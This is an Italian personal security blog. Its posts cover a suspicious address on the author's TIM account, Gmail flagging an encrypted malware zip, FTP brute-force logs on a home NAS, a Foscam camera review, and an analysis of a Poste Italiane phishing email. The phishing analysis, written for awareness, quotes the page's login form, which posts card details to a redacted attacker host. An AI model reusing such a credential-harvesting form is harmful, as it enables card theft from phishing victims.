Il taccuino di Armando Leotta Rotating Header Image

Sicurezza

MyTim, profilo utente o profilo 187, come preferite. La strana presenza e l’imbarazzante supporto TIM via twitter #lin #fb

Mi piacerebbe capire cosa sia successo al MIO profilo per vedere abilitata come mail associate – al MIO profilo – un’indirizzo di una perfetta sconosciuta.

Chi ha aggiunto Antonella Mattei? (non è una nuova fiction)

Chi ha aggiunto Antonella Mattei? (non è una nuova fiction)

 

Qualcuno dovrebbe spiegarmi chi è costei, perchè la sua mail è tra le mie, abilitate e associate al mio profilo.

Scommetto vi starete domandando: “Il profilo è il tuo, l’avrai abilitato tu e non ti ricordi”. NO, non sono stato io. Non entro abitualmente sul portale Tim. Me lo sarei ricordato, potete giurarci.

Ho chiesto spiegazioni via twitter a TelecomItalia:

 

Richiesta supporto TIM via twitter

Un retweet, nessuna risposta.

Dopo circa 5h di silenzio:

tweettelecom2

Dopo un po’ di tempo mi arriva l’invito a fornire info e dettagli via DM.

C’è poco da dettagliare, ho già scritto palesemente tutto quello che c’era da scrivere.

Supporto Telecom

 

Questo è il “supporto”.

TI ritrovi una perfetta sconosciuta abilitata sul tuo profilo? Chi è? Che fa? Cosa ha fatto? Cosa poteva fare? Perchè? Chi l’ha messa lì? Perchè non sono stato informato? Chi l’ha autorizzata?

Le domande sono tante ma la risposta del supporto è CHIARA e UNIVOCA: se non la conosci, toglila no? #echediamine aggiungerei io.

Ovvio, scusate: sono io che ho altre idee di privacy, riservatezza e sicurezza. Ah sì, anche di supporto.

 

#F A I L

Gentilissimi, grazie.

 

 

P.S.: Non uso nemmeno le mie mail @alice.it, nel caso vi meravigliasse il fatto di non averle oscurate.

Non le uso, il motivo risiede in un altro “supporto” da parte di Telecom (NON supporta IMAPS / SMTPS o perlomeno non mi hanno saputo dare indicazioni nemmeno su questo).

imaps0 imaps2 imaps1Per non parlare delle “informazioni” in DM.

Lasciamo stare, è meglio.

Gmail e virus in allegati cifrati

Devo dire che non so da quanto tempo è presente questa “feature“.

Oggi ho avuto la necessità di inviare per mail un allegato contenente un codice malevolo.

Un’attività di routine, nulla di strano o di incredibilmente complicato. Si salva il codice archiviandolo in un archivio compresso e cifrato con password e si spedisce senza grosse difficoltà.

Puoi trovare il server che ti rifiuta l’invio in quanto non riesce ad esaminare preventivamente l’allegato essendo cifrato.

Quello che non mi è mai successo prima è trovare il client (e già qui è interessante il ruolo proattivo) che ti vieta l’invio in quanto riconosce che l’allegato contiene un virus.

gmail blocca il caricamente di un allegato infetto DENTRO uno zip cifrato

gmail blocca il caricamente di un allegato infetto DENTRO uno zip cifrato

Il fatto che dopo qualche secondo dalla fine dell’upload ti sia inibito l’invio per “Virus detected” fa pensare. Ripeto: zip compresso e cifrato con password.

 

 

*** EDIT ***

Per arricchire le informazioni a contorno vi dico che il file zip cifrato era compresso volutamente con la compressione migliore (dunque computazionalmente più pesante).

Il metodo di encryption, AES-256 compatibile con winzip (uso un mac).

Dettagli della compressione e cifratura

Dettagli della compressione e cifratura

 

Per verifica, onde evitare falsi positivi ovvero “non accetto file cifrato nel dubbio fossero infetti e restituisco stringhe allarmanti ma non ho idea di cosa ci sia dentro ma fa molto figo” ho usato gli stessi parametri su un file innocuo:

sample cifrato e non infetto

sample cifrato e non infetto

 

 

Ecco, adesso il quadro è decisamente più completo.

Che dire?

NOTA: alla fine l’ho inviato tramite la webmail di libero, chiaramente senza problemi di caricamento, invio o consegna.

 

*** UPDATE ***

malware cifrato con password di 8 caratteri, un carattere numerico e una lettera maiuscola

malware cifrato con password di 8 caratteri, un carattere numerico e una lettera maiuscola

**** Usando una password complexity migliore (8 caratteri, almeno un maiuscolo, almeno 1 numero) il sample viene correttamente spedito e consegnato. ****

 

Evidentemente effettua un check con un dizionario non particolarmente esteso (performance? costo computazionale?).

Resta da capire perchè entra nel merito di un allegato che intendo spedire cifrato, malevolo o meno.

Sarebbe interessante approfondire  i TOS & AUP.

 

*** UPDATE 2 ***

Ho inviato a VirusTotal i due file cifrati.

Per quello con password complessa nessuno dei motori di scansione riportava anomalie (solo 2 su 54 dichiarava di non riuscire ad ispezionare il file – time out -).

Quello con password semplice, lo stesso intercettato da gmail in fase di upload, è stato rilevato solo da F-prot:

F-Prot rileva un virus (archivio zip con password)

F-Prot rileva un virus (archivio zip con password)

Chissà,  Gmail si appoggia (anche) a quel motore?

Log e dintorni: 138 pagine di attacchi al daemon FTP

Un NAS casalingo, poco tempo e tanti interessi.

Questo è lo scenario di riferimento.

Questa volta spulciando i file di log ho isolato i soliti tentativi spot e improbabili del lamer di turno e quanto è rimasto ha catturato la mia attenzione : 138 pagine di tentativi di login falliti al daemon FTP.

Tutti il 30.03.14, tutti dallo stesso indirizzo IP.

FTP attack

FTP Attack (clicca per ingrandire)

Raccolgo info sull’IP. Di tutto, di più e per non farsi mancare nulla, botnet piuttosto attiva.

Mi vengono in mente le tecniche di fuzzing e le grammatiche sviluppabili su vari framework sia per scovare il buffer overflow che per sferrare l’attacco brute force o dictionary che sia.

Adesso, ringrazio della cortese attenzione ma il $token su cui ciclare è la $password, non lo $username (clicca sullo screenshot per ingrandire)

Detto questo, vedo di trovare il tempo di abilitare un ban dinamico a tempo.

 

IP CAM o network camera: ho provato due Foscam

Dopo qualche settimana di ricerche, confronti e approfondimenti mi sono deciso.

FoscamHo acquistato due IP CAM Foscam: FI9821W e la FI8910W.

Entrambe sono motorizzate e da interno, dotate di filtro I/R che migliora i colori specialmente in condizioni di scarsa luminosità, audio in/out, 802.11b/g/n (+ 10/100 eth), pan & tilt e riprese in infrarossi.

La prima è decisamente superiore: risoluzione HD con codifica H.264, visuale di 70° (invece di 60°) e memory card (caratteristiche che il secondo modello non ha).

Per contro, la 8910 è nativamente integrabile con il mio qnap (da qui la scelta di differenziare gli acquisti).

In entrambi i casi la confezione dei prodotti comprende sia le staffe per il montaggio a muro (stop compresi) sia un utilissimo eth patch cord estensibile.

La gestione e configurazione della cam avviene via web (occorre installare un plugin in dotazione disponibili per tutti i principali browser e OS).

Veniamo alla parte più interessante: la gestione e le possibilità native offerte dall’applicazione a bordo delle cam (chiaramente se volete gestirla via synology o qnap cambiano le modalità di gestione).

Le funzionalità di entrambe le applicazione di gestione sono praticamente identiche.

C’è da segnalare che quella dedicata alla camera più  evoluta è decisamente più gradevole sia come aspetto che come fruibilità.

FInestra principale

FInestra principale

 

Configurazioni

Configurazioni

 

Motion & Sound detection

Motion & Sound detection

 

Allarmi via mail

Allarmi via mail

 

 

Scatti inviati via mail

Scatti inviati via mail

 

Un bel 10 a chi indovina cosa ho in mano nell’ultima foto 😉 Cameo a parte, qualità e dimensione (36-45K max) sono più che accettabili.

Dimenticavo: entrambe hanno la possibilità di “patrol” definendo dei punti specifici da sorvegliare.

Sono molto soddisfatto degli acquisti ma aggiornerò il post sulle problematiche o novità.

NOTA: al momento, sembra che la 8910 riesca a salvare ed inviare esclusivamente immagini in MJPG (Motion JPG) e non video. Non è determinante ma approfondirò con il venditore. La 9821W invia immagini ma salva anche i video direttamente sulla SD.

 *** UPDATE ***

Anche la “piccolina” consente la registrazione video: al momento sono riuscito con altro applicativo (via qnap, ad esempio).

 

Vogliamo guardare in faccia questo #phishing? Ancora #poste

Ancora una volta gli utenti di Poste Italiane sono le vittime di un attacco di phishing.

Una mail, una delle tante che arrivano e che non sono state rilevate dai sistemi di sicurezza?

Non propriamente “una delle tante”.

Guardiamola insieme: ecco come si presenta:

NOTA: tutti i link puntano a poste.it

NOTA: tutti i link puntano a poste.it (cliccare per ingrandire)

Perchè è “ben fatta”? Perchè tutti i link puntano al sito ufficiale di poste.it.

Ripeto per i lettori frettolosi.

Tutti i link puntano a poste.it: il login in alto a destra, il registrati, i banner in basso sia a sinistra che a destra.

Tutti.

Cosa non torna?

Per accedere ai servizi online nessuno si sognerebbe di chiedere i dati di carta di credito al completo (fullz, ndr)!

E’ il caso di controllare il sorgente di questo simpatico htm.

Bingo!

Vedete quel familiarissimo tasto “Accedi”?

_______<stralcio>____

Accedi ai Servizi Online </strong></p>

<form name=”loginform1″ method=”POST” onsubmit=”javascript: return logintest(this);” action=”http://www.XXXXXXXXXX.com/.XXXXXXXX/done.php“>

_______</stralcio>____

Che meravigliosa action!

Pertanto, chi inserisce le credenziali (leggasi i propri dati completi della carta di credito postepay / bancoposta comprensivo di cvv) per “accedere” ai servizi contatta tramite l’azione quel done.php.

Bene.

Verifichiamo cosa fa questo delizioso quanto inaspettato php.

Innanzitutto notiamo se c’è dell’altro sul sito per capire anche la dimensione del fenomeno.

Qui l’attaccante, per probabile dimenticanza o per poter usare la funzionalità con qualche bot, lascia la cartella XXXXXXXX con i permessi per il listing.

Quello che trovo è decisamente un arsenale di tool di attacchi e di spam. Il tutto sfruttabile via web sfruttando le risorse del malcapitato owner del sito web opportunamente bucato.

E non solo.

Trovo un file che non vorrei avere mai trovato.

Tornando sulla pagina incriminata,  scrivendo dei dati finti nella form e completando l’operazione cliccando su “Accedi” si ha l’ennesima triste evidenza: sul server XXXXXX un file è stato appena modificato.

E’ un innocente file di testo che contiene i dati delle carte di credito di tutti gli ignari ed ingenui malcapitati clienti di Postepay/Bancoposta, comprensi quelli fittizi appena inseriti come test.

Ovviamente ho rimosso il nome reale del sito in quanto è ancora raggiungibile.

Mentre vi scrivo ho già effettuato la segnalazione sul sito della Polizia di Stato.

Brutta storia.

Spero serva a riflettere.

#awareness is the key.

_____
Clusit